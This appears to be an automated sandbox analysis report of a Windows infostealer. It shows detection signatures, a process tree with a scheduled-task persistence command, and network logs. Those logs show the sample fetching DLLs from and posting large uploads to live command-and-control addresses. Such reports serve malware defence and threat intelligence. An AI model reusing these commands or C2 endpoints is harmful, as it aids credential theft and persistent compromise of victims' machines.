d2d505a4944a92388e3ba620b02cab05c49be2be4e30329113d6da493223e5bb

Analysis

max time kernel
144s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
09/03/2024, 03:54 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d2d505a4944a92388e3ba620b02cab05c49be2be4e30329113d6da493223e5bb.exe
Size

1.8MB
MD5

be174eb4ffb7b227b2e78644b98ef1ab
SHA1

f97edc25319588b1c995beb7133daf037a1cca1a
SHA256

d2d505a4944a92388e3ba620b02cab05c49be2be4e30329113d6da493223e5bb
SHA512

1d03e5ac4ee0caa2abbeda7f11e67d4699b7d35ea488867ffb0809ecc88035c7d53859ba001f02ebc6ad798941a51a31eb27a5c57d8ac4e0ef7552d6a733aeda
SSDEEP

49152:tIiiK2Sqn5EoSHWvIwQ92lUBTI3IUJS6Yy16qvXuK:qiiK2Vwu2FBClYqGK

Score

9^/10

discovery spyware stealer upx

Malware Config

Signatures

Detect binaries embedding considerable number of MFA browser extension IDs. 2 IoCs

resource	yara_rule
behavioral2/memory/3972-81-0x0000000000400000-0x0000000001F10000-memory.dmp	INDICATOR_SUSPICIOUS_Binary_Embedded_MFA_Browser_Extension_IDs
behavioral2/memory/3972-131-0x0000000000400000-0x0000000001F10000-memory.dmp	INDICATOR_SUSPICIOUS_Binary_Embedded_MFA_Browser_Extension_IDs

Detect binaries embedding considerable number of cryptocurrency wallet browser extension IDs. 2 IoCs

resource	yara_rule
behavioral2/memory/3972-81-0x0000000000400000-0x0000000001F10000-memory.dmp	INDICATOR_SUSPICIOUS_Binary_Embedded_Crypto_Wallet_Browser_Extension_IDs
behavioral2/memory/3972-131-0x0000000000400000-0x0000000001F10000-memory.dmp	INDICATOR_SUSPICIOUS_Binary_Embedded_Crypto_Wallet_Browser_Extension_IDs

Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers. 2 IoCs

resource	yara_rule
behavioral2/memory/3972-81-0x0000000000400000-0x0000000001F10000-memory.dmp	INDICATOR_SUSPICIOUS_Binary_References_Browsers
behavioral2/memory/3972-131-0x0000000000400000-0x0000000001F10000-memory.dmp	INDICATOR_SUSPICIOUS_Binary_References_Browsers

UPX dump on OEP (original entry point) 3 IoCs

resource	yara_rule
behavioral2/files/0x000b00000002324c-19.dat	UPX
behavioral2/memory/3988-21-0x0000000000400000-0x0000000000930000-memory.dmp	UPX
behavioral2/memory/3988-105-0x0000000000400000-0x0000000000930000-memory.dmp	UPX

Downloads MZ/PE file

Executes dropped EXE 2 IoCs

pid	Process
3972	syncUpd.exe
3988	BroomSetup.exe

Loads dropped DLL 4 IoCs

pid	Process
1292	d2d505a4944a92388e3ba620b02cab05c49be2be4e30329113d6da493223e5bb.exe
1292	d2d505a4944a92388e3ba620b02cab05c49be2be4e30329113d6da493223e5bb.exe
3972	syncUpd.exe
3972	syncUpd.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000b00000002324c-19.dat	upx
behavioral2/memory/3988-21-0x0000000000400000-0x0000000000930000-memory.dmp	upx
behavioral2/memory/3988-105-0x0000000000400000-0x0000000000930000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
1052	3972	WerFault.exe	98

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	syncUpd.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	syncUpd.exe

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
4596	schtasks.exe

Suspicious behavior: EnumeratesProcesses 18 IoCs

pid	Process
3972	syncUpd.exe
3972	syncUpd.exe
3972	syncUpd.exe
3972	syncUpd.exe
3972	syncUpd.exe
3972	syncUpd.exe
3972	syncUpd.exe
3972	syncUpd.exe
3972	syncUpd.exe
3972	syncUpd.exe
3972	syncUpd.exe
3972	syncUpd.exe
3972	syncUpd.exe
3972	syncUpd.exe
3972	syncUpd.exe
3972	syncUpd.exe
3972	syncUpd.exe
3972	syncUpd.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3988	BroomSetup.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 1292 wrote to memory of 3972	1292	d2d505a4944a92388e3ba620b02cab05c49be2be4e30329113d6da493223e5bb.exe	98
PID 1292 wrote to memory of 3972	1292	d2d505a4944a92388e3ba620b02cab05c49be2be4e30329113d6da493223e5bb.exe	98
PID 1292 wrote to memory of 3972	1292	d2d505a4944a92388e3ba620b02cab05c49be2be4e30329113d6da493223e5bb.exe	98
PID 1292 wrote to memory of 3988	1292	d2d505a4944a92388e3ba620b02cab05c49be2be4e30329113d6da493223e5bb.exe	100
PID 1292 wrote to memory of 3988	1292	d2d505a4944a92388e3ba620b02cab05c49be2be4e30329113d6da493223e5bb.exe	100
PID 1292 wrote to memory of 3988	1292	d2d505a4944a92388e3ba620b02cab05c49be2be4e30329113d6da493223e5bb.exe	100
PID 3988 wrote to memory of 3212	3988	BroomSetup.exe	101
PID 3988 wrote to memory of 3212	3988	BroomSetup.exe	101
PID 3988 wrote to memory of 3212	3988	BroomSetup.exe	101
PID 3212 wrote to memory of 2620	3212	cmd.exe	103
PID 3212 wrote to memory of 2620	3212	cmd.exe	103
PID 3212 wrote to memory of 2620	3212	cmd.exe	103
PID 3212 wrote to memory of 4596	3212	cmd.exe	104
PID 3212 wrote to memory of 4596	3212	cmd.exe	104
PID 3212 wrote to memory of 4596	3212	cmd.exe	104

C:\Users\Admin\AppData\Local\Temp\d2d505a4944a92388e3ba620b02cab05c49be2be4e30329113d6da493223e5bb.exe
"C:\Users\Admin\AppData\Local\Temp\d2d505a4944a92388e3ba620b02cab05c49be2be4e30329113d6da493223e5bb.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1292
- C:\Users\Admin\AppData\Local\Temp\syncUpd.exe
  C:\Users\Admin\AppData\Local\Temp\syncUpd.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  PID:3972
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3972 -s 2000
    3⤵
    - Program crash
    PID:1052
- C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
  C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:3988
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3212
  - - C:\Windows\SysWOW64\chcp.com
      chcp 1251
      4⤵
      PID:2620
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
      4⤵
      Creates scheduled task(s)
      PID:4596

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=3156 --field-trial-handle=1928,i,13242902252791919845,10377620236057253993,262144 --variations-seed-version /prefetch:3
1⤵
PID:2548

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 3972 -ip 3972
1⤵
PID:648

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3168 --field-trial-handle=1928,i,13242902252791919845,10377620236057253993,262144 --variations-seed-version /prefetch:8
1⤵
PID:4312

Network

DNS

73.31.126.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

73.31.126.40.in-addr.arpa

IN PTR

Response
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

9.228.82.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

9.228.82.20.in-addr.arpa

IN PTR

Response
DNS

240.221.184.93.in-addr.arpa

Remote address:

8.8.8.8:53

Request

240.221.184.93.in-addr.arpa

IN PTR

Response
DNS

41.110.16.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

41.110.16.96.in-addr.arpa

IN PTR

Response

41.110.16.96.in-addr.arpa

IN PTR

a96-16-110-41deploystaticakamaitechnologiescom
GET

http://185.172.128.90/cpa/ping.php?substr=seven&s=ab

d2d505a4944a92388e3ba620b02cab05c49be2be4e30329113d6da493223e5bb.exe

Remote address:

185.172.128.90:80

Request

GET /cpa/ping.php?substr=seven&s=ab HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: 185.172.128.90
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 09 Mar 2024 03:54:47 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
DNS

90.128.172.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

90.128.172.185.in-addr.arpa

IN PTR

Response
DNS

205.47.74.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

205.47.74.20.in-addr.arpa

IN PTR

Response
GET

http://185.172.128.187/ping.php?substr=seven

d2d505a4944a92388e3ba620b02cab05c49be2be4e30329113d6da493223e5bb.exe

Remote address:

185.172.128.187:80

Request

GET /ping.php?substr=seven HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: 185.172.128.187
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 09 Mar 2024 03:54:48 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
DNS

58.55.71.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

58.55.71.13.in-addr.arpa

IN PTR

Response
DNS

187.128.172.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

187.128.172.185.in-addr.arpa

IN PTR

Response
POST

http://185.172.128.145/3cd2b41cbde8fc9c.php

syncUpd.exe

Remote address:

185.172.128.145:80

Request

POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----KKKJEBAAECBGDHIECAKJ
Host: 185.172.128.145
Content-Length: 215
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 09 Mar 2024 03:54:53 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive
Vary: Accept-Encoding
POST

http://185.172.128.145/3cd2b41cbde8fc9c.php

syncUpd.exe

Remote address:

185.172.128.145:80

Request

POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----AKKEHIECFCAAFIEBGIDA
Host: 185.172.128.145
Content-Length: 268
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 09 Mar 2024 03:54:53 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1520
Connection: keep-alive
Vary: Accept-Encoding
POST

http://185.172.128.145/3cd2b41cbde8fc9c.php

syncUpd.exe

Remote address:

185.172.128.145:80

Request

POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----IECFHDBAAECAAKFHDHII
Host: 185.172.128.145
Content-Length: 267
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 09 Mar 2024 03:54:53 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 5416
Connection: keep-alive
Vary: Accept-Encoding
POST

http://185.172.128.145/3cd2b41cbde8fc9c.php

syncUpd.exe

Remote address:

185.172.128.145:80

Request

POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----DBFBFBGDBKJJKFIEHJDB
Host: 185.172.128.145
Content-Length: 4879
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 09 Mar 2024 03:54:53 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
GET

http://185.172.128.145/15f649199f40275b/sqlite3.dll

syncUpd.exe

Remote address:

185.172.128.145:80

Request

GET /15f649199f40275b/sqlite3.dll HTTP/1.1
Host: 185.172.128.145
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 09 Mar 2024 03:54:53 GMT
Content-Type: application/x-msdos-program
Content-Length: 1106998
Connection: keep-alive
Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT
ETag: "10e436-5e7ec6832a180"
Accept-Ranges: bytes
POST

http://185.172.128.145/3cd2b41cbde8fc9c.php

syncUpd.exe

Remote address:

185.172.128.145:80

Request

POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----FHCGCFHDHIIIDGCAAEGD
Host: 185.172.128.145
Content-Length: 355
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 09 Mar 2024 03:54:55 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
POST

http://185.172.128.145/3cd2b41cbde8fc9c.php

syncUpd.exe

Remote address:

185.172.128.145:80

Request

POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----IDHIEBAAKJDHIECAAFHC
Host: 185.172.128.145
Content-Length: 355
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 09 Mar 2024 03:54:55 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
GET

http://185.172.128.145/15f649199f40275b/freebl3.dll

syncUpd.exe

Remote address:

185.172.128.145:80

Request

GET /15f649199f40275b/freebl3.dll HTTP/1.1
Host: 185.172.128.145
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 09 Mar 2024 03:54:56 GMT
Content-Type: application/x-msdos-program
Content-Length: 685392
Connection: keep-alive
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "a7550-5e7e950876500"
Accept-Ranges: bytes
GET

http://185.172.128.145/15f649199f40275b/mozglue.dll

syncUpd.exe

Remote address:

185.172.128.145:80

Request

GET /15f649199f40275b/mozglue.dll HTTP/1.1
Host: 185.172.128.145
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 09 Mar 2024 03:54:56 GMT
Content-Type: application/x-msdos-program
Content-Length: 608080
Connection: keep-alive
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "94750-5e7e950876500"
Accept-Ranges: bytes
GET

http://185.172.128.145/15f649199f40275b/msvcp140.dll

syncUpd.exe

Remote address:

185.172.128.145:80

Request

GET /15f649199f40275b/msvcp140.dll HTTP/1.1
Host: 185.172.128.145
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 09 Mar 2024 03:54:57 GMT
Content-Type: application/x-msdos-program
Content-Length: 450024
Connection: keep-alive
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "6dde8-5e7e950876500"
Accept-Ranges: bytes
GET

http://185.172.128.145/15f649199f40275b/nss3.dll

syncUpd.exe

Remote address:

185.172.128.145:80

Request

GET /15f649199f40275b/nss3.dll HTTP/1.1
Host: 185.172.128.145
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 09 Mar 2024 03:54:57 GMT
Content-Type: application/x-msdos-program
Content-Length: 2046288
Connection: keep-alive
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "1f3950-5e7e950876500"
Accept-Ranges: bytes
GET

http://185.172.128.145/15f649199f40275b/softokn3.dll

syncUpd.exe

Remote address:

185.172.128.145:80

Request

GET /15f649199f40275b/softokn3.dll HTTP/1.1
Host: 185.172.128.145
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 09 Mar 2024 03:54:58 GMT
Content-Type: application/x-msdos-program
Content-Length: 257872
Connection: keep-alive
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "3ef50-5e7e950876500"
Accept-Ranges: bytes
GET

http://185.172.128.145/15f649199f40275b/vcruntime140.dll

syncUpd.exe

Remote address:

185.172.128.145:80

Request

GET /15f649199f40275b/vcruntime140.dll HTTP/1.1
Host: 185.172.128.145
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 09 Mar 2024 03:54:58 GMT
Content-Type: application/x-msdos-program
Content-Length: 80880
Connection: keep-alive
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "13bf0-5e7e950876500"
Accept-Ranges: bytes
POST

http://185.172.128.145/3cd2b41cbde8fc9c.php

syncUpd.exe

Remote address:

185.172.128.145:80

Request

POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----JKEGHDGHCGHDHJKFBFBK
Host: 185.172.128.145
Content-Length: 827
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 09 Mar 2024 03:55:00 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
POST

http://185.172.128.145/3cd2b41cbde8fc9c.php

syncUpd.exe

Remote address:

185.172.128.145:80

Request

POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----KKKJEBAAECBGDHIECAKJ
Host: 185.172.128.145
Content-Length: 267
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 09 Mar 2024 03:55:00 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 2408
Connection: keep-alive
Vary: Accept-Encoding
POST

http://185.172.128.145/3cd2b41cbde8fc9c.php

syncUpd.exe

Remote address:

185.172.128.145:80

Request

POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----GIEHJKEBAAEBGCAAEBFH
Host: 185.172.128.145
Content-Length: 265
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 09 Mar 2024 03:55:00 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 2052
Connection: keep-alive
Vary: Accept-Encoding
POST

http://185.172.128.145/3cd2b41cbde8fc9c.php

syncUpd.exe

Remote address:

185.172.128.145:80

Request

POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----HCFBKKEBKEBGIDHIEHCF
Host: 185.172.128.145
Content-Length: 997431
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 09 Mar 2024 03:55:01 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
POST

http://185.172.128.145/3cd2b41cbde8fc9c.php

syncUpd.exe

Remote address:

185.172.128.145:80

Request

POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----EHIJJDGDHDGDAKFIECFI
Host: 185.172.128.145
Content-Length: 4350027
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 09 Mar 2024 03:55:03 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
POST

http://185.172.128.145/3cd2b41cbde8fc9c.php

syncUpd.exe

Remote address:

185.172.128.145:80

Request

POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----GDAAKKEHDHCAAAKFCBAK
Host: 185.172.128.145
Content-Length: 15735
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 09 Mar 2024 03:55:03 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
POST

http://185.172.128.145/3cd2b41cbde8fc9c.php

syncUpd.exe

Remote address:

185.172.128.145:80

Request

POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----FHCGCFHDHIIIDGCAAEGD
Host: 185.172.128.145
Content-Length: 1903355
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 09 Mar 2024 03:55:04 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
POST

http://185.172.128.145/3cd2b41cbde8fc9c.php

syncUpd.exe

Remote address:

185.172.128.145:80

Request

POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----KJEHDHIEGIIIDHIDHDHJ
Host: 185.172.128.145
Content-Length: 15731
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 09 Mar 2024 03:55:05 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
POST

http://185.172.128.145/3cd2b41cbde8fc9c.php

syncUpd.exe

Remote address:

185.172.128.145:80

Request

POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----AAEHDAAKEHJECBFHCBKF
Host: 185.172.128.145
Content-Length: 363
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 09 Mar 2024 03:55:05 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
POST

http://185.172.128.145/3cd2b41cbde8fc9c.php

syncUpd.exe

Remote address:

185.172.128.145:80

Request

POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----HDHCFIJEGCAKJJKEHJJE
Host: 185.172.128.145
Content-Length: 114667
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 09 Mar 2024 03:55:06 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
POST

http://185.172.128.145/3cd2b41cbde8fc9c.php

syncUpd.exe

Remote address:

185.172.128.145:80

Request

POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----IDHIEBAAKJDHIECAAFHC
Host: 185.172.128.145
Content-Length: 270
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 09 Mar 2024 03:55:06 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
DNS

g.bing.com

Remote address:

8.8.8.8:53

Request

g.bing.com

IN A

Response

g.bing.com

IN CNAME

g-bing-com.a-0001.a-msedge.net

g-bing-com.a-0001.a-msedge.net

IN CNAME

dual-a-0001.a-msedge.net

dual-a-0001.a-msedge.net

IN A

204.79.197.200

dual-a-0001.a-msedge.net

IN A

13.107.21.200
GET

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8c8bda9c3843499ea8c00f67932bec6d&localId=w:AE07C56D-9F7E-DB3B-D18D-2459C76F841B&deviceId=6825825924912662&anid=

Remote address:

204.79.197.200:443

Request

GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8c8bda9c3843499ea8c00f67932bec6d&localId=w:AE07C56D-9F7E-DB3B-D18D-2459C76F841B&deviceId=6825825924912662&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MUID=00F726C13CA36A002CDF32FC3D846BF5; domain=.bing.com; expires=Thu, 03-Apr-2025 03:54:52 GMT; path=/; SameSite=None; Secure; Priority=High;
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: F060C6453331497480E0E717ECF23CB2 Ref B: LON04EDGE0712 Ref C: 2024-03-09T03:54:52Z
date: Sat, 09 Mar 2024 03:54:52 GMT
GET

https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=8c8bda9c3843499ea8c00f67932bec6d&localId=w:AE07C56D-9F7E-DB3B-D18D-2459C76F841B&deviceId=6825825924912662&anid=

Remote address:

204.79.197.200:443

Request

GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=8c8bda9c3843499ea8c00f67932bec6d&localId=w:AE07C56D-9F7E-DB3B-D18D-2459C76F841B&deviceId=6825825924912662&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=00F726C13CA36A002CDF32FC3D846BF5

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MSPTC=cpgZtwyhU19tA5qPVurTDgPdz2OhoklvQhihVPlMSjw; domain=.bing.com; expires=Thu, 03-Apr-2025 03:54:52 GMT; path=/; Partitioned; secure; SameSite=None
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 5439E16E12A4468F8B5BFAF47372F877 Ref B: LON04EDGE0712 Ref C: 2024-03-09T03:54:52Z
date: Sat, 09 Mar 2024 03:54:52 GMT
GET

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8c8bda9c3843499ea8c00f67932bec6d&localId=w:AE07C56D-9F7E-DB3B-D18D-2459C76F841B&deviceId=6825825924912662&anid=

Remote address:

204.79.197.200:443

Request

GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8c8bda9c3843499ea8c00f67932bec6d&localId=w:AE07C56D-9F7E-DB3B-D18D-2459C76F841B&deviceId=6825825924912662&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=00F726C13CA36A002CDF32FC3D846BF5; MSPTC=cpgZtwyhU19tA5qPVurTDgPdz2OhoklvQhihVPlMSjw

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: F44720835E784EAE889EF36D545FF67C Ref B: LON04EDGE0712 Ref C: 2024-03-09T03:54:53Z
date: Sat, 09 Mar 2024 03:54:52 GMT
DNS

145.128.172.185.in-addr.arpa

Remote address:

